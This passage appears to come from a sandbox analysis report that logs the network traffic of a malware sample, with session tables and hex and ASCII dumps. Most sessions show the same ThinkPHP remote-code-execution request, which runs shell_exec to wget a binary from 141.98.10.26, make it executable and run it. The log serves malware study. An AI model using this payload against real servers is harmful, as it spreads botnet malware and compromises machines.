0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 32 38 35 37 31 34 32 39 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 66 66 66 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 32 46 33 32 33 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 73 65 63 74 69 6f 6e 2c 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 20 61 75 74 6f 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 72 65 73 70 6f 6e 73 65 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 43 43 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 Data Ascii: <!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>400 Bad Request</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CCCCCC; } .status-code { font-size: 500%; } .status-reason {
Nov 22, 2023 08:38:41.021193981 CET	6113	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 35 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d Data Ascii: font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000; } .additional-info { background-repeat: no-repeat; background-co
Nov 22, 2023 08:38:41.021204948 CET	6114	IN	Data Raw: 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 6c 65 66 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 Data Ascii: { font-weight: bold; text-align: left; word-break: break-all; width: 100%; } .info-server address { text-align: left; } footer { text-align
Nov 22, 2023 08:38:41.021215916 CET	6115	IN	Data Raw: 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 68 65 61 64 69 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 32 70 78 20 30 20 30 20 39 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: } .info-heading { margin: 62px 0 0 98px; } .info-server address { text-align: left; position: absolute; right: 0; bottom: 0;
Nov 22, 2023 08:38:41.021228075 CET	6116	IN	Data Raw: 62 47 42 74 71 52 46 52 58 6f 36 2b 30 5a 35 59 51 68 35 4c 48 64 39 59 47 57 4f 73 46 2b 39 49 73 35 6f 51 58 63 74 5a 4b 62 76 64 41 41 74 62 48 48 4d 38 2b 47 4c 66 6f 6a 57 64 49 67 50 66 66 37 59 69 66 52 54 4e 69 5a 6d 75 73 57 2b 77 38 66 Data Ascii: bGBtqRFRXo6+0Z5YQh5LHd9YGWOsF+9Is5oQXctZKbvdAAtbHHM8+GLfojWdIgPff7YifRTNiZmusW+w8fDj1xdevNnbU3VFfTEL/W33pfH31cGYBpgW9Lba3Ic8C8iA77NLe514vu8BPj6/n3lCd/VkgKXGkwYUQHAaM+yQunBmNSwbRVYh+kOcgMhvRDB1Md20YfiR+UFfvdIizp2v1vVjt0usa1pmNzAX2IFl5/xaE9aqQGS
Nov 22, 2023 08:38:41.021239042 CET	6118	IN	Data Raw: 35 55 33 77 4d 78 69 6f 69 45 72 52 6d 32 6e 75 68 64 38 51 52 43 41 38 49 77 54 52 41 57 31 4f 37 50 41 73 62 74 43 50 79 4d 4d 67 4a 70 2b 31 2f 49 61 78 71 47 41 52 7a 72 46 74 74 70 68 55 52 2b 4d 76 45 50 53 78 2b 36 6d 2f 70 43 78 45 69 33 Data Ascii: 5U3wMxioiErRm2nuhd8QRCA8IwTRAW1O7PAsbtCPyMMgJp+1/IaxqGARzrFttphUR+MvEPSx+6m/pCxEi3Y7p485ESAVmuldvzSTKw2fqHSGM5hBW1IUI0f/LdONtEUKXGC95jK+Rg4QBVwNmlePZVjTxuo24kWMrQHg/nZzxDqmqFRFC799+dbEirMoVEXhVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGE
Nov 22, 2023 08:38:41.021258116 CET	6119	IN	Data Raw: 4c 57 6b 51 38 77 6f 42 4b 79 52 2b 2b 64 55 54 73 75 45 4b 2b 4c 38 70 32 42 44 34 66 47 64 73 66 71 68 78 47 51 54 51 5a 6c 75 48 55 4c 58 72 52 73 55 46 66 42 45 30 4f 67 7a 49 6c 72 61 52 38 76 6b 77 36 71 6e 58 6d 75 44 53 46 38 52 67 53 38 Data Ascii: LWkQ8woBKyR++dUTsuEK+L8p2BD4fGdsfqhxGQTQZluHULXrRsUFfBE0OgzIlraR8vkw6qnXmuDSF8RgS8th+d+phci8FJf1fwapi44rFpfqTZAnW+JFRG3kf94Z+sSqdR1UIiI/dc/B6N/M9WsiADO00A3QU0hohX5RTdeCrstyT1WphURTBevBaV4iwYJGGctRDC1FsGaQ3RtGFfL4os34g6T+AkAT84bs0fX2weS88X7X6hX
Nov 22, 2023 08:38:41.021270990 CET	6120	IN	Data Raw: 34 30 30 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 Data Ascii: 400</span> <span class="status-reason">Bad Request</span> </section> <section class="contact-info"> Please forward this error screen to curator.servers.prgn.misp.co.uk's <a href="mailto:
Nov 22, 2023 08:38:41.021282911 CET	6121	IN	Data Raw: 75 74 6d 5f 6d 65 64 69 75 6d 3d 63 70 6c 6f 67 6f 26 75 74 6d 5f 63 6f 6e 74 65 6e 74 3d 6c 6f 67 6f 6c 69 6e 6b 26 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 34 30 30 72 65 66 65 72 72 61 6c 22 20 74 61 72 67 65 74 3d 22 63 70 61 6e 65 6c 22 20 74 Data Ascii: utm_medium=cplogo&utm_content=logolink&utm_campaign=400referral" target="cpanel" title="cPanel, Inc."> <img src="/img-sys/powered_by_cpanel.svg" height="20" alt="cPanel, Inc." /> <div class="copyright">C

Session ID	Source IP	Source Port	Destination IP	Destination Port
286	192.168.2.23	33076	95.101.146.136	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:40.849760056 CET	6106	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:41.038134098 CET	6122	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:40 GMT Date: Wed, 22 Nov 2023 07:38:40 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 65 32 62 63 39 31 37 26 23 34 36 3b 31 37 30 30 36 33 38 37 32 30 26 23 34 36 3b 31 62 62 31 30 32 35 38 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.9e2bc917.1700638720.1bb10258</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
287	192.168.2.23	51394	95.216.90.184	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:40.877404928 CET	6108	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:41.079255104 CET	6123	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:37 GMT Server: Apache/2 Content-Length: 226 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
288	192.168.2.23	54920	95.110.209.71	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:40.952260971 CET	6109	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:41.154227972 CET	6126	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:38:38 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
289	192.168.2.23	42638	95.59.110.213	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:41.087287903 CET	6124	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:41.334878922 CET	6210	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:38:41.335031986 CET	6210	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
290	192.168.2.23	58972	31.173.14.181	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:41.136635065 CET	6125	IN	HTTP/1.0 400 Bad Request Content-type: text/html Date: Wed, 22 Nov 2023 07:38:41 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 3e 3c 48 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 48 31 3e 0a 55 6e 73 75 70 70 6f 72 74 65 64 20 6d 65 74 68 6f 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>400 Bad Request</TITLE></HEAD><BODY><H1>400 Bad Request</H1>Unsupported method</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
291	192.168.2.23	48818	95.100.238.21	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.555443048 CET	6335	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:42.739765882 CET	6350	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 258 Expires: Wed, 22 Nov 2023 07:38:42 GMT Date: Wed, 22 Nov 2023 07:38:42 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 35 64 37 65 31 39 62 38 26 23 34 36 3b 31 37 30 30 36 33 38 37 32 32 26 23 34 36 3b 32 32 38 34 38 65 66 30 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.5d7e19b8.1700638722.22848ef0</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
292	192.168.2.23	39498	95.100.51.244	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.559238911 CET	6336	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:42.747495890 CET	6351	IN	HTTP/1.0 400 Bad Request Server: AkamaiGHost Mime-Version: 1.0 Content-Type: text/html Content-Length: 257 Expires: Wed, 22 Nov 2023 07:38:42 GMT Date: Wed, 22 Nov 2023 07:38:42 GMT Connection: close Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 33 37 31 36 31 35 30 32 26 23 34 36 3b 31 37 30 30 36 33 38 37 32 32 26 23 34 36 3b 66 65 61 30 62 31 39 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http://%5bNo%20Host%5d/index.php?", is invalid.<p>Reference #9.37161502.1700638722.fea0b19</BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
293	192.168.2.23	33560	95.56.16.119	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.639472008 CET	6348	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:42.907397985 CET	6355	IN	HTTP/1.1 200 OK
Nov 22, 2023 08:38:42.907715082 CET	6356	IN	Data Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www

Session ID	Source IP	Source Port	Destination IP	Destination Port
294	192.168.2.23	48130	95.179.180.96	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.735862017 CET	6349	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:42.916424990 CET	6357	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 22 Nov 2023 07:38:42 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
295	192.168.2.23	33556	95.217.53.65	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.834352016 CET	6352	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:43.030167103 CET	6360	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:42 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 305 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 74 65 73 74 2e 73 65 65 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache/2.4.41 (Ubuntu) Server at test.seee.com Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
296	192.168.2.23	57626	95.216.87.24	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:42.834418058 CET	6353	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
